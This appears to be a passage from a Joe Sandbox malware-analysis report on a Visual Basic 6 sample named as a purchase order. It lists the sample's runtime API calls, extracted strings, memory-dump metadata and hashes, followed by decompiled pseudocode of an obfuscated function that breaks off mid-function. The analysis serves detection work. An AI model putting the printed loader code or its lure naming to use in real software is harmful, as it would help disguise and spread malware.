__vbaGet3.MSVBVM60(00000000,00401194,00000001,?,?,?,00000000,00000000,?,?,?,?,?,?,00401336), ref: 0042462D
__vbaFileClose.MSVBVM60(00000001,00000000,00401194,00000001,?,?,?,00000000,00000000,?,?,?,?,?,?,00401336), ref: 00424634
__vbaStrCat.MSVBVM60(AUL,triforniaobesities,00000001,00000000,00401194,00000001,?,?,?,00000000,00000000,?,?), ref: 00424643
__vbaStrMove.MSVBVM60(AUL,triforniaobesities,00000001,00000000,00401194,00000001,?,?,?,00000000,00000000,?,?), ref: 0042464D
__vbaStrCopy.MSVBVM60(AUL,triforniaobesities,00000001,00000000,00401194,00000001,?,?,?,00000000,00000000,?,?), ref: 0042465A
__vbaFreeStr.MSVBVM60(AUL,triforniaobesities,00000001,00000000,00401194,00000001,?,?,?,00000000,00000000,?,?), ref: 00424662
#648.MSVBVM60(0000000A), ref: 00424679
__vbaNew2.MSVBVM60(004101D4,0042A010,0000000A), ref: 00424698
__vbaObjSet.MSVBVM60(?,00000000), ref: 004246D1
__vbaChkstk.MSVBVM60(?,00000000), ref: 0042471B
__vbaChkstk.MSVBVM60(?,00000000), ref: 0042472F
__vbaChkstk.MSVBVM60(?,00000000), ref: 00424743
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,000001D0,?,?,00000000), ref: 004247B2
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004247C9
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 004247D1
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,00000000), ref: 004247E9
__vbaObjSet.MSVBVM60(?,00000000,?,?,00000000), ref: 00424822
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,000001E0,?,?,00000000), ref: 0042486C
#648.MSVBVM60(0000000A,?,?,?,?,00000000), ref: 00424892
__vbaNew2.MSVBVM60(004101D4,0042A010,0000000A,?,?,?,?,00000000), ref: 004248B1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00000000), ref: 004248EA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FACC,00000078,?,?,?,?,00000000), ref: 00424931
#564.MSVBVM60(00000004,?,?,?,?,?,?,?,00000000), ref: 0042495D
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,?,?,?,?,?,?,00000000), ref: 00424977
__vbaNew2.MSVBVM60(004101D4,0042A010,00000004,?,?,?,?,?,?,?,00000000), ref: 0042499E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,00000000), ref: 004249D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FADC,000001B0,?,?,?,?,?,?,00000000), ref: 00424A21
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,00000000), ref: 00424A55
__vbaI4Var.MSVBVM60(?,?,00003607,004E3788,?,?,?,?,?,?,?,?,?,00000000), ref: 00424A7C
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,000006F8,?,?,?,?,?,?,?,?,?,00000000), ref: 00424AC1
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00424ADF
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00424AF5
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00424B0B
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00424B26
__vbaObjSet.MSVBVM60(?,00000000), ref: 00424B5F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FACC,00000170), ref: 00424BA9
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00424BD0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00424C09
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,00000180), ref: 00424C56
#564.MSVBVM60(00000004,?), ref: 00424C82
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 00424C9C
__vbaI4Var.MSVBVM60(?,?,00000004,?), ref: 00424CC5
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,000006FC), ref: 00424D0B
__vbaFreeStr.MSVBVM60(00000000,004011C8,0040F6C0,000006FC), ref: 00424D2D
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00424D3C
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 00424D4E
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00424D69
__vbaObjSet.MSVBVM60(?,00000000), ref: 00424DA2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,00000068), ref: 00424DE9
__vbaFreeObj.MSVBVM60 ref: 00424E37
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,00000700), ref: 00424E81
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00424EB3
__vbaObjSet.MSVBVM60(?,00000000), ref: 00424EEC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040FAEC,00000050), ref: 00424F30
__vbaLenBstr.MSVBVM60(?,00575FB7,TOMMELTOTTENS,00000000), ref: 00424F61
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,00000704), ref: 00424F97
__vbaStrMove.MSVBVM60(00000000,004011C8,0040F6C0,00000704), ref: 00424FC1
__vbaFreeStr.MSVBVM60(00000000,004011C8,0040F6C0,00000704), ref: 00424FC9
__vbaFreeObj.MSVBVM60(00000000,004011C8,0040F6C0,00000704), ref: 00424FD1
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00424FE9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425022
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040FAFC,00000070), ref: 00425069
#564.MSVBVM60(00000004,?), ref: 00425095
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 004250AF
#648.MSVBVM60(0000000A,00000004,?), ref: 004250D5
__vbaNew2.MSVBVM60(004101D4,0042A010,0000000A,00000004,?), ref: 004250F4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042512D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,000001E8), ref: 0042517A
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 004251A1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004251DA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FB2C,00000148), ref: 00425227
__vbaI4Var.MSVBVM60(?,?,00005A29,0000371D,?), ref: 00425265
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,00000708), ref: 0042529B
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004252BD
__vbaFreeVarList.MSVBVM60(00000003,00000004,0000000A,?), ref: 004252D3
#696.MSVBVM60(flothedernestipuloi), ref: 004252EE
__vbaNew2.MSVBVM60(004101D4,0042A010,flothedernestipuloi), ref: 0042530D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425346
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FACC,00000130), ref: 00425390
__vbaLateIdCallLd.MSVBVM60(00000004,?,00000000,00000000), ref: 004253AF
__vbaStrVarMove.MSVBVM60(00000004,0039201A,?,?,?,?,flothedernestipuloi), ref: 004253C7
__vbaStrMove.MSVBVM60(00000004,0039201A,?,?,?,?,flothedernestipuloi), ref: 004253D1
__vbaFreeStr.MSVBVM60(?,?,?,flothedernestipuloi), ref: 004253FC
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,flothedernestipuloi), ref: 0042540B
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,flothedernestipuloi), ref: 00425416
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,?,?,flothedernestipuloi), ref: 0042542E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425467
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,00000050), ref: 004254AB
#524.MSVBVM60(?,00000008), ref: 004254E4
__vbaNew2.MSVBVM60(004101D4,0042A010,?,00000008), ref: 004254FC
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425535
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,00000198), ref: 0042557F
__vbaStrVarMove.MSVBVM60(?), ref: 004255A0
__vbaStrMove.MSVBVM60(?), ref: 004255AA
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,0000070C), ref: 004255F4
__vbaFreeStrList.MSVBVM60(00000002,?,00000000), ref: 0042561D
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,flothedernestipuloi), ref: 0042562F
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,flothedernestipuloi), ref: 00425641
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 0042567F
__vbaObjSet.MSVBVM60(?,00000000), ref: 004256B8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,00000060), ref: 004256FF
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00425726
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042575F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,00000078), ref: 004257A6
#564.MSVBVM60(00000004,?), ref: 004257D2
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 004257EC
__vbaI4Var.MSVBVM60(?,00000004,?), ref: 00425804
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00425834
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 00425846
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00425861
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042589A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,00000048), ref: 004258DE
#522.MSVBVM60(?,00000008), ref: 00425917
#588.MSVBVM60(00000016,000000C0,000000EB,?,00000008), ref: 00425928
__vbaStrVarMove.MSVBVM60(?,00000016,000000C0,000000EB,?,00000008), ref: 00425943
__vbaStrMove.MSVBVM60(?,00000016,000000C0,000000EB,?,00000008), ref: 0042594D
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,00000710), ref: 004259AE
__vbaFreeStr.MSVBVM60(00000000,004011C8,0040F6C0,00000710), ref: 004259D3
__vbaFreeObj.MSVBVM60(00000000,004011C8,0040F6C0,00000710), ref: 004259DB
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 004259EA
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00425A05
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425A3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,000000E0), ref: 00425A8B
#696.MSVBVM60(AUDIOFONENALG), ref: 00425AA4
#696.MSVBVM60(flothedernestipuloi,AUDIOFONENALG), ref: 00425AB5
_adj_fdiv_m64.MSVBVM60(flothedernestipuloi,AUDIOFONENALG), ref: 00425AE4
_adj_fdiv_m64.MSVBVM60(flothedernestipuloi,AUDIOFONENALG), ref: 00425B06
#705.MSVBVM60(00000005,00000000,flothedernestipuloi,AUDIOFONENALG), ref: 00425B25
__vbaStrMove.MSVBVM60(00000005,00000000,flothedernestipuloi,AUDIOFONENALG), ref: 00425B2F
#523.MSVBVM60(00000000,00000005,00000000,flothedernestipuloi,AUDIOFONENALG), ref: 00425B35
__vbaStrMove.MSVBVM60(00000000,00000005,00000000,flothedernestipuloi,AUDIOFONENALG), ref: 00425B3F
#648.MSVBVM60(0000000A,00000000,00000005,00000000,flothedernestipuloi,AUDIOFONENALG), ref: 00425B71
__vbaStrMove.MSVBVM60(001D9C15,00000000,0000000A,00000000,00000005,00000000,flothedernestipuloi,AUDIOFONENALG), ref: 00425B85
__vbaLenBstrB.MSVBVM60(00000000,001D9C15,00000000,0000000A,00000000,00000005,00000000,flothedernestipuloi,AUDIOFONENALG), ref: 00425B8B
__vbaFreeStrList.MSVBVM60(00000003,00000000,00000000,00000000), ref: 00425BC5
__vbaFreeObj.MSVBVM60 ref: 00425BD0
__vbaFreeVarList.MSVBVM60(00000002,00000005,0000000A), ref: 00425BDF
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00425BFA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425C33
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,00000060), ref: 00425C7A
#537.MSVBVM60(000000A6), ref: 00425C93
__vbaStrMove.MSVBVM60(000000A6), ref: 00425C9D
__vbaNew2.MSVBVM60(004101D4,0042A010,000000A6), ref: 00425CB5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425CEE
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040FACC,00000120), ref: 00425D3B
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00425D62
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425D9B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FB2C,00000108), ref: 00425DE5
__vbaLateIdCallLd.MSVBVM60(00000005,?,00000000,00000000), ref: 00425E04
__vbaI4Var.MSVBVM60(00000005), ref: 00425E10
__vbaStrCopy.MSVBVM60(00000005), ref: 00425E23
__vbaStrMove.MSVBVM60(EP2,?,00000000,?,Canvased,00000005), ref: 00425E65
__vbaLenBstr.MSVBVM60(00000000,EP2,?,00000000,?,Canvased,00000005), ref: 00425E6B
__vbaFreeStrList.MSVBVM60(00000003,00000000,00000000,00000000), ref: 00425E93
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 00425EAD
__vbaFreeVar.MSVBVM60 ref: 00425EB8
#698.MSVBVM60(00000005,00000C8E), ref: 00425EC6
__vbaNew2.MSVBVM60(004101D4,0042A010,00000005,00000C8E), ref: 00425EDE
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425F17
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,00000198), ref: 00425F61
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00425F88
__vbaObjSet.MSVBVM60(?,00000000), ref: 00425FC1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040FADC,000000A0), ref: 0042600E
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 00426043
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042604D
__vbaLenBstr.MSVBVM60(00000000,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00426055
__vbaStrVarMove.MSVBVM60(00000005,00000000,00000006,000000FF,000000FE,000000FE,000000FE), ref: 0042606D
__vbaStrMove.MSVBVM60(00000005,00000000,00000006,000000FF,000000FE,000000FE,000000FE), ref: 00426077
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,00000714), ref: 004260CD
__vbaFreeStrList.MSVBVM60(00000003,00000000,00000000,00000000), ref: 004260EF
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000005,00000C8E), ref: 00426101
__vbaFreeVarList.MSVBVM60(00000002,00000006,00000005,?,?,?,?,?,00000005,00000C8E), ref: 00426113
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,?,?,?,?,00000005,00000C8E), ref: 0042612E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00426167
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,000001B8), ref: 004261B1
__vbaLateIdCallLd.MSVBVM60(00000005,?,00000000,00000000), ref: 004261D0
__vbaStrVarMove.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,00000005,00000C8E), ref: 004261DC
__vbaStrMove.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,00000005,00000C8E), ref: 004261E6
__vbaStrCopy.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,00000005,00000C8E), ref: 004261F3
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000005,00000C8E), ref: 00426220
__vbaFreeStrList.MSVBVM60(00000003,00000000,00000000,00000000), ref: 00426233
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00426245
__vbaFreeVar.MSVBVM60 ref: 00426250
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040F6C0,00000718), ref: 00426285
__vbaFreeStr.MSVBVM60(00426310), ref: 004262F2
__vbaFreeStr.MSVBVM60(00426310), ref: 004262FA
__vbaFreeObj.MSVBVM60(00426310), ref: 00426302
__vbaFreeStr.MSVBVM60(00426310), ref: 0042630A

Strings

triforniaobesities, xrefs: 00424639
appdata, xrefs: 0042458E
AUL, xrefs: 0042463E
Scripting.FileSystemObject, xrefs: 004244EB
EP2, xrefs: 00425E55, 00425E5B
HIPPOMETER, xrefs: 00424514
fc, xrefs: 00425952
FONDETSEVENTUALIZESDYNA, xrefs: 0042608D
TOMMELTOTTENS, xrefs: 00424F52
flothedernestipuloi, xrefs: 004252E9, 00425AB0
FolderExists, xrefs: 0042454F
Betalingsdygtige5, xrefs: 004261EB
Canvased, xrefs: 00425E3F
AUDIOFONENALG, xrefs: 00425A9F
\yf6svhF8LWErfw4ZrCRuxOdYLn2c7qO224, xrefs: 004245BD
Febricitant, xrefs: 00425E1B

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresult$List$New2$Move$Chkstk$#564#648BstrCallCopyLate$#696$File_adj_fdiv_m64$#518#522#523#524#537#557#588#610#666#698#702#703#705#714#716AddrefCloseGet3Open
String ID: AUDIOFONENALG$AUL$Betalingsdygtige5$Canvased$EP2$FONDETSEVENTUALIZESDYNA$Febricitant$FolderExists$HIPPOMETER$Scripting.FileSystemObject$TOMMELTOTTENS$\yf6svhF8LWErfw4ZrCRuxOdYLn2c7qO224$appdata$fc$flothedernestipuloi$triforniaobesities
API String ID: 2260295881-2597019713
Opcode ID: 541489f253602c062dd0bfb568f8a2ed953350ce82908a659657bba7f164ac99
Instruction ID: d863a9cd4a1948ddb8335f443d152f7ad2d2783b460bc36a1238144c3deac068
Opcode Fuzzy Hash: 541489f253602c062dd0bfb568f8a2ed953350ce82908a659657bba7f164ac99
Instruction Fuzzy Hash: 5013F871A00228EFDB20EF90DC45FDDB7B8BB08304F5045AAE50ABB2A1D7795A85DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00427566 Relevance: 151.1, APIs: 77, Strings: 9, Instructions: 634
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00427566(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v4;
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v28;
				void* _v32;
				short _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				char _v56;
				void* _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				void* _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr _v132;
				void* _v136;
				signed int _v140;
				char* _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				void* _v184;
				signed int _v188;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v260;
				intOrPtr _v264;
				signed int _t277;
				signed int _t285;
				signed int _t289;
				char* _t291;
				signed int _t301;
				signed int _t304;
				signed int _t308;
				signed int _t312;
				signed int _t314;
				signed int _t324;
				signed int _t328;
				short _t329;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t344;
				signed int _t345;
				signed int _t353;
				signed int* _t359;
				signed int _t363;
				signed int* _t367;
				signed int _t371;
				short _t372;
				intOrPtr _t376;
				char* _t379;
				signed int _t380;
				signed int _t384;
				void* _t388;
				void* _t390;
				char* _t425;
				void* _t458;
				intOrPtr _t460;
				void* _t462;
				char* _t464;
				void* _t467;
				intOrPtr _t469;
				void* _t470;
				void* _t472;
				void* _t473;
				void* _t476;
				intOrPtr _t477;

				_t462 = __esi;
				_t458 = __edi;
				_t390 = __ecx;
				_t388 = __ebx;
				_t467 = _t472;
				_t473 = _t472 - 0x18;
				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t473;
				_push(0x20);
				L00401330();
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = _t473;
				_v24 = 0x401258;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				_v8 = 2;
				_v48 = 0x788e;
				_v44 = 1;
				_v40 = _v40 & 0x00000000;
				while(_v40 <= _v48) {
					_v8 = 3;
					_push(0xffffffff);
					L0040143E();
					_v8 = 4;
					_t277 = _v40 + _v44;
					if(_t277 < 0) {
						L00401438();
						_push(_t467);
						_t469 = _t473;
						_push(_t390);
						_push(_t390);
						_push(0x401336);
						_push( *[fs:0x0]);
						 *[fs:0x0] = _t473;
						L00401330();
						_push(_t388);
						_push(_t462);
						_push(_t458);
						_v64 = _t473;
						_v60 = 0x401290;
						L00401504();
						_v144 = L"windir";
						_v152 = 8;
						L0040151C();
						_push( &_v120);
						_push( &_v136);
						L00401522();
						if( *0x42a010 != 0) {
							_v136 = 0x42a010;
						} else {
							_push(0x42a010);
							_push(0x4101d4);
							L0040155E();
							_v136 = 0x42a010;
						}
						_t285 =  &_v56;
						L00401564();
						_v112 = _t285;
						_t289 =  *((intOrPtr*)( *_v112 + 0x130))(_v112,  &_v48, _t285,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x308))( *_v136));
						asm("fclex");
						_v116 = _t289;
						if(_v116 >= 0) {
							_v140 = _v140 & 0x00000000;
						} else {
							_push(0x130);
							_push(0x40fafc);
							_push(_v112);
							_push(_v116);
							L00401558();
							_v140 = _t289;
						}
						_push(0xf3);
						_push( &_v88);
						_t291 =  &_v44;
						_push(_t291);
						L0040142C();
						_push(_t291);
						L00401450();
						L00401588();
						_push(_t291);
						_push(_v48);
						L00401432();
						_v120 =  ~(0 | _t291 < 0x00000000);
						_push( &_v48);
						_push( &_v52);
						_push( &_v44);
						_push(3);
						L004014E0();
						L00401552();
						_push( &_v88);
						_push( &_v72);
						_push(2);
						L00401576();
						_t476 = _t473 + 0x1c;
						if(_v120 == 0) {
							L22:
							if( *0x42a010 != 0) {
								_v152 = 0x42a010;
							} else {
								_push(0x42a010);
								_push(0x4101d4);
								L0040155E();
								_v152 = 0x42a010;
							}
							_t301 =  &_v56;
							L00401564();
							_v112 = _t301;
							_t304 =  *((intOrPtr*)( *_v112 + 0x1c8))(_v112, _t301,  *((intOrPtr*)( *((intOrPtr*)( *_v152)) + 0x320))( *_v152));
							asm("fclex");
							_v116 = _t304;
							if(_v116 >= 0) {
								_v156 = _v156 & 0x00000000;
							} else {
								_push(0x1c8);
								_push(0x40fabc);
								_push(_v112);
								_push(_v116);
								L00401558();
								_v156 = _t304;
							}
							L00401552();
							_v28 = 0xa2;
							_push(0x4279dd);
							L00401516();
							L00401516();
							return _t304;
						} else {
							if( *0x42a010 != 0) {
								_v144 = 0x42a010;
							} else {
								_push(0x42a010);
								_push(0x4101d4);
								L0040155E();
								_v144 = 0x42a010;
							}
							_t308 =  &_v56;
							L00401564();
							_v112 = _t308;
							_t312 =  *((intOrPtr*)( *_v112 + 0x128))(_v112,  &_v108, _t308,  *((intOrPtr*)( *( *_v144) + 0x31c))( *_v144));
							asm("fclex");
							_v116 = _t312;
							if(_v116 >= 0) {
								_v148 = _v148 & 0x00000000;
							} else {
								_push(0x128);
								_push(0x40fc94);
								_push(_v112);
								_push(_v116);
								L00401558();
								_v148 = _t312;
							}
							_t314 = _v40 - _v108;
							if(_t314 < 0) {
								L00401438();
								_t470 = _t476;
								_t477 = _t476 - 0xc;
								 *[fs:0x0] = _t477;
								L00401330();
								_v172 = _t477;
								_v168 = 0x4012a0;
								_v164 = 0;
								 *((intOrPtr*)( *_v152 + 4))(_v152, _t458, _t462, _t388, 0x60,  *[fs:0x0], 0x401336, _t469);
								L00401504();
								_v244 = 0x1311;
								_v240 = 1;
								_v188 = _v188 & 0x00000000;
								while(_v40 <= _v96) {
									if( *0x42a010 != 0) {
										_v108 = 0x42a010;
									} else {
										_push(0x42a010);
										_push(0x4101d4);
										L0040155E();
										_v108 = 0x42a010;
									}
									_t333 =  &_v56;
									L00401564();
									_v80 = _t333;
									_t336 =  *((intOrPtr*)( *_v80 + 0x1ac))(_v80, _t333,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x348))( *_v108));
									asm("fclex");
									_v84 = _t336;
									if(_v84 >= 0) {
										_v112 = _v112 & 0x00000000;
									} else {
										_push(0x1ac);
										_push(0x40faec);
										_push(_v80);
										_push(_v84);
										L00401558();
										_v112 = _t336;
									}
									L00401552();
									_v64 = 0x80020004;
									_v72 = 0xa;
									if( *0x42a010 != 0) {
										_v116 = 0x42a010;
									} else {
										_push(0x42a010);
										_push(0x4101d4);
										L0040155E();
										_v116 = 0x42a010;
									}
									_t340 =  &_v56;
									L00401564();
									_v80 = _t340;
									_t344 =  *((intOrPtr*)( *_v80 + 0x48))(_v80,  &_v48, _t340,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x364))( *_v116));
									asm("fclex");
									_v84 = _t344;
									if(_v84 >= 0) {
										_v120 = _v120 & 0x00000000;
									} else {
										_push(0x48);
										_push(0x40fb2c);
										_push(_v80);
										_push(_v84);
										L00401558();
										_v120 = _t344;
									}
									_t345 = 0x10;
									L00401330();
									_t464 =  &_v72;
									_t460 = _t477;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_push(L"NONASBESTINE");
									_push(L"OVERASSESSMENT");
									_push(L"ansamlende"); // executed
									L00401408(); // executed
									L00401588();
									_push(_t345);
									_push(_v48);
									L00401432();
									asm("sbb eax, eax");
									_v88 =  ~( ~( ~_t345));
									_push( &_v48);
									_push( &_v52);
									_push(2);
									L004014E0();
									_t477 = _t477 + 0xc;
									_t425 =  &_v56;
									L00401552();
									if(_v88 != 0) {
										while( *((intOrPtr*)(_v4 + 0x64)) < 0xd8) {
											_t199 = _v4 + 0x64; // 0x428a36
											_t376 =  *_t199 + 1;
											if(_t376 < 0) {
												L61:
												L00401438();
												_push(_t470);
												_push(_t425);
												_push(_t425);
												_push(0x401336);
												_push( *[fs:0x0]);
												 *[fs:0x0] = _t477;
												_push(0x38);
												L00401330();
												_push(_t388);
												_push(_t464);
												_push(_t460);
												_v264 = _t477;
												_v260 = 0x4012b0;
												if( *0x42a010 != 0) {
													_v76 = 0x42a010;
												} else {
													_push(0x42a010);
													_push(0x4101d4);
													L0040155E();
													_v76 = 0x42a010;
												}
												_t359 =  &_v40;
												L00401564();
												_v64 = _t359;
												_v48 = 0x80020004;
												_v56 = 0xa;
												L00401330();
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t363 =  *((intOrPtr*)( *_v64 + 0x174))(_v64, 0x10, _t359,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x31c))( *_v76));
												asm("fclex");
												_v68 = _t363;
												if(_v68 >= 0) {
													_v80 = _v80 & 0x00000000;
												} else {
													_push(0x174);
													_push(0x40fc94);
													_push(_v64);
													_push(_v68);
													L00401558();
													_v80 = _t363;
												}
												L00401552();
												if( *0x42a010 != 0) {
													_v84 = 0x42a010;
												} else {
													_push(0x42a010);
													_push(0x4101d4);
													L0040155E();
													_v84 = 0x42a010;
												}
												_t367 =  &_v40;
												L00401564();
												_v64 = _t367;
												_t371 =  *((intOrPtr*)( *_v64 + 0x1a0))(_v64,  &_v60, _t367,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x320))( *_v84));
												asm("fclex");
												_v68 = _t371;
												if(_v68 >= 0) {
													_v88 = _v88 & 0x00000000;
												} else {
													_push(0x1a0);
													_push(0x40fabc);
													_push(_v64);
													_push(_v68);
													L00401558();
													_v88 = _t371;
												}
												_t372 = _v60;
												_v36 = _t372;
												L00401552();
												_push(0x427ea1);
												return _t372;
											}
											 *((intOrPtr*)(_v4 + 0x64)) = _t376;
											_t203 = _v4 + 0x60; // 0x80007
											_t425 = _v4;
											 *((intOrPtr*)(_t425 + 0x60)) =  *_t203;
										}
										_push(L"Fumlende3");
										_push(L"INTERBREEDS");
										_push(L"Genoptrykkenes4");
										_push(L"Cavernlike6"); // executed
										L00401402(); // executed
									}
									_t353 = _v40 + _v92;
									if(_t353 < 0) {
										goto L61;
									} else {
										_v40 = _t353;
										continue;
									}
									break;
								}
								if( *0x42a010 != 0) {
									_v124 = 0x42a010;
								} else {
									_push(0x42a010);
									_push(0x4101d4);
									L0040155E();
									_v124 = 0x42a010;
								}
								_t324 =  &_v56;
								L00401564();
								_v80 = _t324;
								_t328 =  *((intOrPtr*)( *_v80 + 0x108))(_v80,  &_v76, _t324,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x330))( *_v124));
								asm("fclex");
								_v84 = _t328;
								if(_v84 >= 0) {
